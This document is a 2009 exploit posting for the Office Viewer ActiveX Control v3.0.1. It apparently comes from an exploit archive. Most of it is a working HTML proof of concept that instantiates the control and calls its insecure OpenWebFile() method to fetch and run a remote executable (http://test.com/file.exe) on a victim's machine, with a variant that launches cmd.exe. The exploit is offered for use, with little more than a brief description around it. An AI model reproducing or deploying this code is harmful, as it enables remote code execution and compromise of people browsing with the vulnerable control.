officeviewer-exec.txt
Posted on 14 January 2009
=======================================================================================<br> Author: Houssamix <br> =======================================================================================<br> Office Viewer ActiveX Control v 3.0.1 Remote File execution exploit <br> download : http://www.anydraw.com/download/EOfficeOCX.exe <br> Tested on Windows XP Professional SP2 , with Internet Explorer 6 <br><br> description : this use to insecure methods "OpenWebFile()" for execute remote file in pc victime <br> u can also execute a local file in pc victime usign this methode "Open()" , just change the function do_it with this : <b> function Do_it() { File = "c:\windows\system32\cmd.exe" hsmx.OpenWebFile(File) } <br> =======================================================================================<br> <HTML> <BODY> <object id=hsmx classid="clsid:{97AF4A45-49BE-4485-9F55-91AB40F288F2}"></object> <SCRIPT> function Do_it() { File = "http://test.com/file.exe" hsmx.OpenWebFile(File) } </SCRIPT> <input language=JavaScript onclick=Do_it() type=button value="exploit"> </body> </HTML>
